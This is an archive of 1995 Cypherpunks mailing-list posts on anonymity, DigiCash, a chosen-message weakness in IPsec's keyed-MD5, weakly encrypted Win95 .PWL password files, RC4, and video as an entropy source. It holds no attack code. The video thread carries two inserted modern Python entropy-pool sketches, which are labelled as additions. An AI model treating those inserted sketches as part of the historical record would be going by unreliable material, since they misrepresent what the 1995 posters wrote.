> What's your working definition of "integrity" in this context ?

Integrity:=
1) Steadfast adherence to a strict moral and ethical code.
2) A state of being unimpaired; soundness.
3) The quality or condition of being whole or undivided; soundness
Also) soundness, completeness,
Alternatively:
1) Strict personal honesty and independence...
2) Completeness; unity...
3) The state of being unimpaired; soundness...''

In this context, I might be misinterpreted as having meant that it is impossible to have both integrity and anonymity. That is not what I meant, although it is probably also true in a very strict sense.

To clarify, I don't think you can assure integrity when you have anonymity. This follows from my earlier writings (circa 1984-89), which are fairly extensive, and in which I made the only marginally supported claim that you can't have (i.e., assure) both integrity and secrecy in a system with sharing. This came originally from the result that integrity + secrecy = no sharing (ala the combination of Biba and Bell-LaPadula) which was extended into a POset which characterizes the extent to which integrity and secrecy can be maintained based on transitive information flow.

The less mathematical reasoning is that in order to be able to verify integrity, you have to be able to examine the information that is secret, while having secrecy requires that you not be able to have independent verification. Thus the two limit each other. Anonymity, in this context, can be thought of as secrecy.
-- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From cjs at netcom.com Wed Nov 1 18:59:04 1995 From: cjs at netcom.com (cjs) Date: Thu, 2 Nov 1995 10:59:04 +0800 Subject: [FRED] Anonymity and Integrity In-Reply-To: <199511011907.OAA16631@opine.cs.umass.edu> Message-ID: <199511011930.LAA28734@netcom20.netcom.com> > My turn to rise to the bait... > > Dr. Frederick B. Cohen writes: > > I have been thinking about the issues of anonymity for some time, and I > > have been convinced for some time that you can't have both integrity and > > anonymity. > > What's your working definition of "integrity" in this context ? Come on.. we're never gonna get Dr. Fred to go away if we keep giving him attention. Christopher From zuhn at sctc.com Wed Nov 1 19:18:36 1995 From: zuhn at sctc.com (david d `zoo' zuhn) Date: Thu, 2 Nov 1995 11:18:36 +0800 Subject: D.C. (and other?) C'punx at C.S.I. show? Message-ID: I'm going to be in D.C. for the CSI show next week (Nov 5-8), and would be interested in getting together (dinner, beer, whatever) with other folks interested in cypherpunkish things. If a number of you respond, I'll try to coordinate some sort of group event if at all possible. Send me mail, give me a call, or stop by booth 111. -- david d `zoo' zuhn -- secure computing corporation -- zuhn at sctc.com From greg at ideath.goldenbear.com Wed Nov 1 19:29:47 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Thu, 2 Nov 1995 11:29:47 +0800 Subject: Cable TV Privacy (was Re: InfoWar) Message-ID: <199511010907.AA28156@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Scott Brickner writes: > David G. Koontz writes: > > > >>Industry representatives played down the privacy loopholes. > >>Ronald Plesser, a Washington attorney who represents online > >>services and direct marketing firms, said, "I know of no > >>example of anybody trafficking in e-mail descriptions." 
A
> >>spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
> >>do not release names of customers that ordered movies.
> >
> >The name of the customer of a video tape rental may be disclosed
> >only under narrow constraints (USC 18 Chap 121 2710):

> Didn't you read the post? The whole point was that the constraints
> *don't* cover many *new* technology. Sure, your local video store
> can't release the data, but your *cable* company is under no such
> constraint with regard to pay-per-view. Ditto with Hughes DirecTV.

Local cable TV companies *are* constrained re recordkeeping about consumer choices and disclosure of that data - see 47 USC 551, the "Cable Television Consumer Protection and Competition Act of 1992". They must disclose at the time you sign up for service and once yearly what data they keep about your watching/purchasing choices, and who that data is disclosed to. They must dispose of that data when it is no longer useful for the purpose for which it was collected. Consumers get liquidated damages of the greater of $100 per day or $1000, plus attorney's fees and (maybe) punitive damages.

But I agree that cable TV != DirecTV, and that Hughes seems to be unregulated in this field.

From stewarts at ix.netcom.com Wed Nov 1 19:36:46 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 2 Nov 1995 11:36:46 +0800
Subject: ecash remailer
Message-ID: <199511020239.SAA27491@ix.ix.netcom.com>

At 01:20 PM 11/1/95 -0500, Michael Froomkin wrote:
>I thought a property of Chaumian DigiCash was that a coin *had* to go back
>to the bank before it could be spent again.

No.
The basic Chaum Digicash method looks like this: 1) Alice creates a number of a recognizable form (Chaum's 1985 CACM paper uses n1n2n3...n64n1n2n3....n64, i.e. a 64-bit number concatenated with itself). 2) Alice blinds the number and sends it to the bank (along with some request for withdrawing money from her account or payment in other coin or whatever.) 3) The bank signs the number and sends it back. 4) Alice unblinds the coin; now it's good, recognizably signed, and untraceable. 5a) Alice gives the coin to Bob, who deposits it; the bank records the coin number, and in case of double-spending, the first person to the bank wins. This is useful for on-line transactions, or off-line where everyone trusts each other. OR 5b) Alice gives the coin to Bob using a complicated cut&choose protocol that doesn't give away her identity if it's only used once, but if she also gives the same coin to Carol with the same protocol, Bob and Carol can identify Alice with probability 1 - 1/2**n, for some adequately large n. This is more work, but you can use it for off-line transactions where you don't trust Alice not to double-spend. The protocol doesn't say what to do to Alice if you catch her cheating; depending on the environment you can debit her account or sue her etc. 6) Bob now has a number, signed by the Bank of Foo, which he can either give to them to deposit or get cash or use for highway toll (if Foo is really the highway company) or give to somebody else to spend (which is a little messy in the cut&choose method.) >Logically, I can see at least four possibilities: >1) payee data is encoded onto the coin at time of payment, making it >impossible for Carol to bank the coin. I see no evidence of this in the >docs at the Digicash site, but I just rechecked quickly and may have >missed it. The basic protocol doesn't say anything about what a valid coin looks like; you could use the example in Chaum's paper or a long string followed by a checksum or whatever. 
You _could_ put the payee's name account number in the string as the 64-bit "random" number, or even put both payer and payee. The bank could insist on that sort of thing if they wanted. If I remember right, the version in the Digicash trial left you the choice of filling in a specific payee or using "@" for bearer-payable coins. >2) No payee data as such is encoded on the coin but it is marked "spent" >to prevent multiple uses by payee to the detriment of payor. The bank marks the coin spent upon deposit. >3) the Digicash software only allows you to send a "spent" coin to the >bank. You have to hack the software to send the coin to Carol (do you >have to break your own key?). I don't know if their merchant-client software lets you do this or not, but it's just a matter of implementation, not protocol. >4) nothing in the DigiCash software or protocol prevents you from sending >a coin to Carol so long as you trust Carol not to get you in trouble by >misusing the coin in some way. That's why Chaum is interested in >hardware based agents that would keep you from respending coins you receive. Your problem isn't trusting Carol not to get you in trouble, it's trusting Alice not to spend the coin again. Hardware-based agents are interesting because they make it easier to enforce double-spending prevention in off-line systems, and to offer better anonymity because you've got more trust that the person didn't double-spend. Stefan Brands has done a lot of work on this. In on-line systems you can check whether a coin's been spent already by depositing it - the problem is that on-line systems aren't always convenient for many applications (e.g. newspaper machines), and the costs of communication for an on-line system may be higher than the cost of a sufficiently smart smart-card. 
#--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From tcmay at got.net Wed Nov 1 19:43:17 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 2 Nov 1995 11:43:17 +0800 Subject: Hit-and-Run Anonymous Posts (Re: "Dr." Fred) Message-ID: Before someone corrects me: I wrote: "Exceptions are the cases when an anonymous source has something "sensitive" to contribute, such as the release of the putative MD4 code, and the like." MD or RC4, I forget which it was. My point is that anonymity has been used to post stuff like this (putatively), and that this is a "good" use of anonymity. Good in the sense of being non-flamish, non-infantile. (Not everyone thinks using anonymous posts to "liberate" intellectual property is a "good" thing, but then I'm sure a lot of people don't think it's good that the secrets of how to fix plumbing are written up in books for all to read.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From perry at piermont.com Wed Nov 1 20:10:21 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 2 Nov 1995 12:10:21 +0800 Subject: Keyed-MD5, and HTTP-NG In-Reply-To: <9510018152.AA815244951@snail.rsa.com> Message-ID: <199511011820.NAA02107@jekyll.piermont.com> "baldwin" writes: > I also understand your being upset about not hearing about this > attack the moment it was published. 
Actually, as soon as RSA Labs confirmed
> the weakness we did call some of the editors of the IPsec specifications
> to let them know about it. The consensus was that this was not a show
> stopper.

There were two names on the MD5 document -- mine and Bill Simpson's. Bill didn't tell me that he was called (I suspect he would have), and I wasn't called, either. We were the only two editors of that portion of the specification.

Given that my name was on that document and that I made a large effort to try to make sure that people examined the algorithms and thought they were good, and that I have some of my reputation tied to that document, I am rather unhappy at the fact that I only find out third hand about what people in the field have determined about our selected algorithm.

> The IPsec protocols could be rolled out as is. Later, once a
> better authenticator had been developed and tested, it could be
> substituted for the existing one. One of the excellent features of the
> IPsec specification is that new algorithms can be substituted easily
> (modulo a "small matter of programming").

I know. I was one of the designers. We all understood extremely well that crypto algorithms become rapidly obsolete. However, we needed to specify a reasonably strong baseline transform that would be widely deployed. I was shocked at the level of trouble we had in getting the cryptoweenies to successfully agree on a keyed hash based transform no matter how long was spent on the topic. I've got to say that my opinion of the academic crypto community dropped substantially after the experience. I would have thought that people could at least have agreed on what they knew and didn't know. This was strikingly different from my experience with other mathematical fields, in which the experts seem to agree pretty readily about what is and isn't known.
> Perhaps your main complaint is that it took time for the attack > to be confirmed by other researchers before the issue was brought to > the IPsec authors. That is another effect of the current state of the > art in Cryptography, and an effect of the normal academic process. People might have noted their suspicions to us. As engineers, we are capable of avoiding something based on on suspected weakness without solid confirmation -- we aren't trying to publish papers, we are trying to get things to work. Perry From froomkin at law.miami.edu Wed Nov 1 20:17:49 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Thu, 2 Nov 1995 12:17:49 +0800 Subject: ecash remailer In-Reply-To: <199510311940.OAA31415@opine.cs.umass.edu> Message-ID: Now I am fully confused. I thought a property of Chaumian DigiCash was that a coin *had* to go back to the bank before it could be spent again. Yet all "coin exchange" schemes discussed here recently involve Alice paying Bob who then sends the coin to Carol's Exchange who then sends it to the bank while sending some other value, maybe a Carol coin, to Bob. Logically, I can see at least four possibilities: 1) payee data is encoded onto the coin at time of payment, making it impossible for Carol to bank the coin. I see no evidence of this in the docs at the Digicash site, but I just rechecked quickly and may have missed it. 2) No payee data as such is encoded on the coin but it is marked "spent" to prevent multiple uses by payee to the detriment of payor. ditto on the evidence. 3) the Digicash software only allows you to send a "spent" coin to the bank. You have to hack the software to send the coin to Carol (do you have to break your own key?). 4) nothing in the DigiCash software or protocol prevents you from sending a coin to Carol so long as you trust Carol not to get you in trouble by misusing the coin in some way. That's why Chaum is interested in hardware based agents that would keep you from respending coins you receive. 
No doubt there are others. Anyone know what the reality is? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From nobody at REPLAY.COM Wed Nov 1 20:22:34 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 2 Nov 1995 12:22:34 +0800 Subject: IBM's Microkernal Message-ID: <199511011817.TAA17785@utopia.hacktic.nl> Responding to msg by perry at piermont.com ("Perry E. Metzger") on Wed, 01 Nov 11:51 AM >Why is this being sent to cypherpunks? Its totally >irrelevant. It's related to IBM's work on machine/code interface security, encryption and authentication capabilities. Cryptographers may want to examine how these work in Microkernal. If IBM will allow access to the features. And it's related to parallel alarms sounded on cypherpunks about the impossibility of any durable security which does not anticipate ever-changing attacks devised by authors of competing products and services. Finally, not your hat size, to be sure, it's related to the vanity of computer security consultants who dismiss unknown competition at the peril of their credibility. "The free market is a terror for tortured souls." Anonymous. From s1113645 at tesla.cc.uottawa.ca Wed Nov 1 20:28:45 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Thu, 2 Nov 1995 12:28:45 +0800 Subject: IETF on the web. In-Reply-To: <9511020101.AA05060@zorch.w3.org> Message-ID: On Wed, 1 Nov 1995 hallam at w3.org wrote: > email alone is past. I wish I could persuade more people in the IETF > that the Web infrastructure could provide a valuable assistance Have you tried ? Seems to have all the relevant links, Perry's stuff included. From baldwin at RSA.COM Wed Nov 1 20:29:40 1995 From: baldwin at RSA.COM (baldwin (Robert W. 
Baldwin))
Date: Thu, 2 Nov 1995 12:29:40 +0800
Subject: Keyed-MD5, and HTTP-NG
Message-ID: <9510018152.AA815244951@snail.rsa.com>

Perry,

I wish that the field of cryptography was as well advanced as the field of Bridge Building. A modern Bridge Builder can design a bridge that is easy to construct and will in fact last for 100 years. Unfortunately, modern Cryptography is like Bridge Building in the late 1800s. Back then, it was possible to build bridges that did last for 100 years but lots of cities refused to pay the extra costs in materials, labor and time to make a solid bridge, and as a result the bridges did not last. To make it worse, there was no systematic teaching of the best practices, so often no one would realize that they had built and/or bought a weak bridge until the day that it fell apart.

The sad result of the state of the art in Cryptography is that we end up with situations like the one you described where it takes months to get agreement among Cryptographers and then it turns out that one of the other choices would have been better. Not surprisingly, the other choices often run slower than the initial choice. However, there is little guarantee that the second choice will resist all new attacks. One of the reasons that the IPsec authenticator was analyzed was that it had been chosen as the IPsec authenticator. As soon as a large organization picks a new authenticator, the researchers will try their hand on breaking that one. In the field of Cryptographic Engineering, we just don't have a well tested construct for authenticators.

If the IPsec group was run by scientists instead of engineers, then they would consider cryptographic constructs that have "provable" security properties (e.g., faking this authenticator is as hard as factoring a Blum integer (a composite number with two strong primes)). The downside of having this kind of provable security is that the packet processing time would be enormous.
You would lose all the benefits of a T1 connection to the Internet in order to get provable security on your authenticator or encryptor. Speaking for myself, I am glad that the IETF is run by engineers.

The vitriol you spewed is quite justified. People at RSA and IBM both agreed that the IPsec authenticator would resist all known attacks. In fact, a fully conformant IPsec implementation will still resist the new attack because IPsec requires that all keys be changed every 2**32 packets. However, this new attack makes Cryptographers nervous. Perhaps it could be extended to work with only 2**40 chosen packets in which case there is a noticeable chance of it succeeding with only 2**32 packets. Only further research will tell. Currently, the only way to get the MD5 key is to feed in 2**60 chosen messages of various lengths. Of course, this is another good reason to use different keys for the MD5 authenticator and packet encryption. Wisely, IPsec requires different keys for the authenticator and the encryptor.

I also understand your being upset about not hearing about this attack the moment it was published. Actually, as soon as RSA Labs confirmed the weakness we did call some of the editors of the IPsec specifications to let them know about it. The consensus was that this was not a show stopper. The IPsec protocols could be rolled out as is. Later, once a better authenticator had been developed and tested, it could be substituted for the existing one. One of the excellent features of the IPsec specification is that new algorithms can be substituted easily (modulo a "small matter of programming").

Perhaps your main complaint is that it took time for the attack to be confirmed by other researchers before the issue was brought to the IPsec authors. That is another effect of the current state of the art in Cryptography, and an effect of the normal academic process.
It takes time to understand and confirm a weakness, and it is necessary to confirm weaknesses (researchers make mistakes in designing attacks just like they make mistakes in designing ciphers). That's the way things are in "cryptography today".

I guess my conclusion is to say "Sorry". Several professional cryptographers gave it their best shot, and the authenticator turned out to be somewhat weaker than expected.

--Bob

______________________________ Reply Separator _________________________________
Subject: Re: Keyed-MD5, and HTTP-NG
Author: perry at piermont.com at INTERNET
Date: 10/31/95 5:25 PM

"baldwin" writes:
> Simon,
> There are a few different ways to add key material to MD5 to
> make it suitable as a shared-secret authenticator function. Some of these
> are less resistant to attacks than others. For example, the keyed MD5
> mechanism that is part of the current IPsec specifications can be
> attacked using 2**60 chosen messages. Fortunately, the IPsec specs
> also require that the shared MD5 key be changed every 2**32 messages,
> so this attack is unlikely to succeed. Specifically, IPsec uses
> MD5 as follows: X = MD5(key | keypad | Message), where "|" means
> concatenation and the "keypad" pads out the key to 512 bits.
> Basically, this function is the same as standard MD5 with a
> different initialization vector for the compression operation
> on the first block of the message.
> RSA Labs recommends that people use an authenticator like
> X = MD5(key1, MD5(key2, Message)). This resists the chosen plaintext
> attacks that were published at the crypto conference in Spring 1995.

Pardon me. The amount of vitriol I am going to spew is probably difficult for people to understand because most folks around here weren't following the keyed MD5 discussions during the IPSEC work and have no idea of the sort of crap the professional cryptographic community put us through.
We spent months, and months, and months, and months, getting advice from every cryptographer on the planet. Every conceivable combination of pads, multiple keys, keys before the text, after, before and after, etc., was discussed over and over and over again. Finally, the folks at RSA and IBM both agreed that Hugo's scheme, the one we were putting in to place, was the best possible one. (That's the one with the padded key.)

What the flying hell are you doing telling us now, and indeed not even telling the IPSEC community but instead mumbling on cypherpunks, that you guys were in possession of information BEFORE the entire discussion in midsummer that indicated that your own advice was wrong?

Perry

From adisaacs at mtu.edu Wed Nov 1 22:27:58 1995
From: adisaacs at mtu.edu (Andrew D. Isaacson)
Date: Thu, 2 Nov 1995 14:27:58 +0800
Subject: Video as a source of randomness
Message-ID: <199511020602.BAA23380@supreme.csl.mtu.edu>

A thought just occurred to me... How useful would it be to use a video stream as a source of random input to something like /dev/random? I'm thinking along the lines of a Connectix QuickCam (sp?) or the cool videocam that comes with the Indy. It seems to me that the picture received by a camera sitting atop a monitor would be quite unpredictable. (relatively) High bandwidth, too. Even if the entropy in a video signal is low, the high bandwidth would seem to make up for it.

Struggling to keep my head above the crypto tide,
andy
--
Andrew Isaacson finger adisaacs at colossus.csl.mtu.edu Freshman/Comp Sci @ Michigan Technological University for PGP public key
==========================================================================
"Hi, I'm, I'm, I'm... you'll have to forgive me, I'm terrible with names."
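The idea in the message above (a low-entropy but high-bandwidth video feed as /dev/random input), sketched as an added example that is not part of the original post: every frame is hashed into a pool, but only a derated min-entropy estimate of the frame-to-frame noise is credited, so a stuck or covered camera never yields a seed. The frame size, the 1/8 derating factor, the 256-bit target and the simulated frames are assumptions constructed for this sketch.

```python
import hashlib
import math
import random
from collections import Counter

WIDTH, HEIGHT = 64, 48   # constructed tiny greyscale frame, one byte per pixel
TARGET_BITS = 256        # credited entropy required before a seed is released
DERATE = 0.125           # assumption: credit 1/8 of the estimate, because
                         # neighbouring pixels and frames are correlated


def min_entropy_bits(samples):
    """Min-entropy per sample, -log2(p_max), from the most common value."""
    if not samples:
        return 0.0
    p_max = Counter(samples).most_common(1)[0][1] / len(samples)
    return 0.0 if p_max == 1.0 else -math.log2(p_max)


class VideoEntropyPool:
    """Hashes every frame into the pool but credits only frame-to-frame noise."""

    def __init__(self, target_bits=TARGET_BITS, derate=DERATE):
        self._pool = hashlib.sha256()
        self._prev = None
        self.target_bits = target_bits
        self.derate = derate
        self.credited_bits = 0.0

    def add_frame(self, frame):
        """Mix one frame in and return the entropy (bits) credited for it."""
        credit = 0.0
        if self._prev is not None and len(frame) == len(self._prev):
            # Differencing cancels the static scene (which an observer may
            # know) and leaves sensor noise. Scene motion would inflate this
            # estimate, so the sketch assumes a fixed camera and scene.
            diffs = [(a - b) & 0xFF for a, b in zip(frame, self._prev)]
            credit = min_entropy_bits(diffs) * len(diffs) * self.derate
        self._pool.update(frame)   # mixing in uncredited data does no harm
        self._prev = frame
        self.credited_bits += credit
        return credit

    def seed(self):
        """Return a 32-byte seed, or None while too little entropy is credited."""
        if self.credited_bits < self.target_bits:
            return None
        return self._pool.digest()


def harvest(frames, target_bits=TARGET_BITS):
    """Feed frames until the pool can release a seed; None if it never can."""
    pool = VideoEntropyPool(target_bits)
    for frame in frames:
        pool.add_frame(frame)
        seed = pool.seed()
        if seed is not None:
            return seed
    return None


def constructed_frames(count, noise, rng):
    """Constructed test input: a fixed scene plus +/- `noise` levels per pixel."""
    scene = bytes(rng.randrange(256) for _ in range(WIDTH * HEIGHT))
    for _ in range(count):
        yield bytes((p + rng.randint(-noise, noise)) & 0xFF for p in scene)


if __name__ == "__main__":
    stuck = harvest(constructed_frames(10, 0, random.Random(1)))
    noisy = harvest(constructed_frames(10, 1, random.Random(2)))
    print("stuck camera seed:", stuck)
    print("noisy camera seed:", noisy.hex() if noisy else None)
```

The simulated noise here comes from a seeded PRNG purely so the run is repeatable; a real deployment would read frames from the capture device and would still need the estimate validated against that particular sensor.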
From weidai at eskimo.com Wed Nov 1 22:30:40 1995 From: weidai at eskimo.com (Wei Dai) Date: Thu, 2 Nov 1995 14:30:40 +0800 Subject: Rivest on the Design of RC4 In-Reply-To: <9510018152.AA815247765@snail.rsa.com> Message-ID: > Professor Ron Rivest will be presenting a talk titled > "The Design of RC4" at the RSA Data Security Conference in San Francisco > (January 17 to 19). It should be interesting. What will the legal status of RC4 be after this talk? Will RSADSI stop claiming that RC4 is still protected as a trade secret, or will everyone attending the talk be required to sign NDAs? Wei Dai

From llurch at networking.stanford.edu Wed Nov 1 22:55:54 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Thu, 2 Nov 1995 14:55:54 +0800 Subject: Win95 password caching In-Reply-To: <478rbq$o31@yuma.ACNS.ColoState.EDU> Message-ID: <199511020642.WAA17156@Networking.Stanford.EDU> (A copy of this message has also been posted to the following newsgroups: csu.windows95, comp.os.ms-windows.win95.misc,comp.os.ms-windows.win95.setup,comp.security.misc,alt.security,comp.os.ms-windows.networking.misc,comp.os.ms-windows.networking.windows,comp.os.ms-windows.nt.admin.networking) [A little more context and Message-ID added from the original post; cross-posted to nt.admin because it will affect some of you, followups out] In article <4791l0$4n14 at holly.ACNS.ColoState.EDU>, unicorn at holly.ACNS.ColoState.EDU (Scott McCormack) wrote: > In article <478rbq$o31 at yuma.ACNS.ColoState.EDU>, > Jim Carlson (jimc at cnr.colostate.edu) wrote: > : Does anyone know how to stop Win95 from caching the windows password? > : We are thinking of using Win95 as the client for a student lab and > : need to find a way to stop it from caching passwords. As it is, when > : you log into a machine for the first time it creates a .pwl file in > : your windows directory for each person who logs into windows. This > : is not acceptable for a lab situation.
> : > : I can turn this off in WfWG by placing the line "passwordcachine=no" > : in the system.ini under [NETWORK], but this does not work in Win95. > : > : I am running MS networking in Win95, so when you first log into > : windows, it asks you to log into the MS Network. It then comes up with > : a second box asking you to enter your Win95 password. You can enter > : a blank password (""), but it still creates a .pwl file and places a > : line in win.ini. > > Change the password for the login (or when you first login) to a blank > line (ie don't enter a password) and you'll never see that login prompt > again. :) This was not the question. He wants to prevent local Windows passwords from being created for network-only users. This is a serious security issue, because if a user enters her real network password for the Windows password, and someone else later picks up the .PWL files, which are not encrypted in a particularly secure way, then someone can get unauthorized access to the network as the previous user(s). We believe we have found answers in the Registry and in POLEDIT. We've also turned up another related security bug. When it's confirmed, we'll post. In the meantime, you can read the last couple messages archived at gopher://quixote.stanford.edu/1m/win95netbugs. -rich llurch at networking.stanford.edu moderator of the win95netbugs list http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

From mark at lochard.com.au Wed Nov 1 23:10:25 1995 From: mark at lochard.com.au (Mark) Date: Thu, 2 Nov 1995 15:10:25 +0800 Subject: Hit-and-Run Anonymous Posts (Re: "Dr." Fred) In-Reply-To: Message-ID: <199511020706.AA20612@junkers.lochard.com.au> >Pseudonyms are another matter entirely. Some are classy (Pr0duct Cypher, >Black Unicorn, Lucky Green), some are oafish (S Boxx), some are ephemeral. >Persistence of the identity, as when backed by digital signatures, is >important. (Though not essential, yet.) You forgot (how could you?!??) BIFF!!!
:) Mark From don at cs.byu.edu Wed Nov 1 23:21:10 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Thu, 2 Nov 1995 15:21:10 +0800 Subject: MD5 of CFS131, hacktic Message-ID: <199511020513.WAA00191@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- >From: Andreas Bogk >Please report any leakage of this software immediately to this list. >From: Mats Bergstrom >Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz I diffed 1.3 that CFS that I got from att research. The package arrived to hacktic intact. I sent PGP-signed MD5 of 1.3.1 to utopia, but got this back: >From: Oliver Daudey >Subject: Re: CFS 1.3.1 >Date: Mon, 30 Oct 1995 15:51:10 +0100 (MET) > >> I have done an md5 on the new cfs. (Everything after the cutmarks) >> Here it is. Hope you have it soon... >> >> 262b4c6fbec7c729e3e10292f5ea8afb cfs.1.3.1 >> >> Don > >Sorry, but I need something which is certified with the SSH distribution- >key (keyID DCB9AE01). Hmmmm ok. Well, I'll sign it again, for you Cpunks. If you get a different MD5 (this is everything AFTER the cutmarks) we can diff it. Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMJhTJcLa+QKZS485AQHsIwL/fkh8d39uW8M7Fo/slO6Rbb42j7tneqz2 wcePuYqyjGFN93IfjPI0ew1jjNqnzI+je6C0dBhk4eTjN7xAFczTqe1U6+yAKZX5 DnX2waPV/i8Pva0NB0t5lzRfCaB1OM/r =8IC6 -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://students.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Junk mail to root at 127.0.0.1 * This user insured by the Smith, Wesson, & Zimmermann insurance company * From tcmay at got.net Wed Nov 1 23:46:04 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 2 Nov 1995 15:46:04 +0800 Subject: Video as a source of randomness Message-ID: At 6:02 AM 11/2/95, Andrew D. Isaacson wrote: >A thought just occurred to me... > >How useful would it be to use a video stream as a source of random input >to something like /dev/random? 
I'm thinking along the lines of a >Connectix QuickCam (sp?) or the cool videocam that comes with the Indy. >It seems to me that the picture received by a camera sitting atop a >monitor would be quite unpredictable. (relatively) High bandwidth, too. >Even if the entropy in a video signal is low, the high bandwidth would >seem to make up for it. > >Struggling to keep my head above the crypto tide, Digitized video input, especially from something like a noisy channel (t.v. channel, for example), is quite likely to produce a lot more entropy bits per second than nearly any of us ever need. (One's PGP key could be seeded in a fraction of a millisecond, for example.) The issue is that most people don't need this number of entropy bits per second, and that most people don't have video inputs. (And those that do may not have them hooked up and ready to go.) One of the basic ideas we have had, as Cypherpunks, is to encourage widespread methods. Any methods that need special hardware tend to not get widely used. Audio, video, disk timing, and all sorts of other sources of physical randomness are useful to have, but most people either won't have the right configuration or won't configure their systems so as to use their configuration. --Tim May, who has both audio and video digitizers built into his Power Macintosh 7100av, but notes that none of the crypto programs he uses has any provision for using them, and so he doesn't use them for crypto purposes. Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway."
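The idea in this exchange (camera frames as input to something like /dev/random, with bandwidth making up for low entropy per sample), sketched as an added example that is not code from either poster or from any /dev/random implementation: every frame is hashed into a pool, but only a derated estimate is credited, and a frozen input is refused. The frame size, the 10% derating factor, the noise model and all names are assumptions, and the frames are constructed data standing in for a real digitizer.

```python
import hashlib
import math
import random
from collections import Counter

FRAME_PIXELS = 64 * 48   # assumed: small greyscale frame, one byte per pixel
DERATE = 0.1             # assumed safety factor: credit 10% of the estimate


def constructed_frame(rng, scene, noise_sigma):
    """Constructed stand-in for a digitizer: a fixed scene plus Gaussian noise."""
    return bytes(min(255, max(0, round(p + rng.gauss(0.0, noise_sigma))))
                 for p in scene)


def delta_lsbs(prev, cur):
    """Low bit of each pixel's change between frames; a static scene cancels out."""
    return [(c - p) & 1 for p, c in zip(prev, cur)]


def min_entropy_per_sample(samples):
    """Most-common-value estimate, -log2(p_max), in bits per sample.
    It treats samples as independent, which real pixels are not; DERATE
    is the (assumed) allowance for that."""
    p_max = max(Counter(samples).values()) / len(samples)
    return max(0.0, -math.log2(p_max))


class VideoEntropyPool:
    """Hashes every frame into a pool but credits only a derated estimate."""

    def __init__(self):
        self._hash = hashlib.sha256()
        self._prev = None
        self.credited_bits = 0.0

    def add_frame(self, frame):
        # All of the frame is mixed in; only the credit is conservative.
        self._hash.update(len(frame).to_bytes(4, "big") + frame)
        if self._prev is not None and len(self._prev) == len(frame):
            bits = delta_lsbs(self._prev, frame)
            self.credited_bits += DERATE * len(bits) * min_entropy_per_sample(bits)
        self._prev = frame

    def seed(self, need_bits=128):
        """Return 32 bytes of seed, or refuse if too little has been credited."""
        if self.credited_bits < need_bits:
            raise RuntimeError("only %.0f of %d bits credited"
                               % (self.credited_bits, need_bits))
        digest = self._hash.digest()
        self._hash = hashlib.sha256(b"next" + digest)   # carry the pool forward
        self.credited_bits = 0.0
        return hashlib.sha256(b"seed" + digest).digest()


def run_demo():
    rng = random.Random(1995)   # fixed seed so the constructed frames repeat
    scene = [rng.randrange(40, 200) for _ in range(FRAME_PIXELS)]
    noisy, frozen = VideoEntropyPool(), VideoEntropyPool()
    for _ in range(4):
        # sigma 0.3: most pixels do not change at all between frames
        noisy.add_frame(constructed_frame(rng, scene, 0.3))
        # sigma 0: a frozen or disconnected input, the failure case
        frozen.add_frame(constructed_frame(rng, scene, 0.0))
    result = {"noisy_bits": noisy.credited_bits, "frozen_bits": frozen.credited_bits}
    result["seed"] = noisy.seed(128)
    try:
        frozen.seed(128)
        result["frozen_refused"] = False
    except RuntimeError:
        result["frozen_refused"] = True
    return result


if __name__ == "__main__":
    r = run_demo()
    print("noisy input credited %.0f bits, seed %s"
          % (r["noisy_bits"], r["seed"].hex()))
    print("frozen input credited %.0f bits, refused: %s"
          % (r["frozen_bits"], r["frozen_refused"]))
```

With this noise level a single pair of frames is credited with less than 128 bits, so the pool needs several frames before it will release a seed.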
From gjeffers at socketis.net Thu Nov 2 00:32:23 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Thu, 2 Nov 1995 16:32:23 +0800 Subject: Was I censored before Cypherpunks? Message-ID: <199511021217.GAA09629@mail.socketis.net> :: Encrypted: PGP

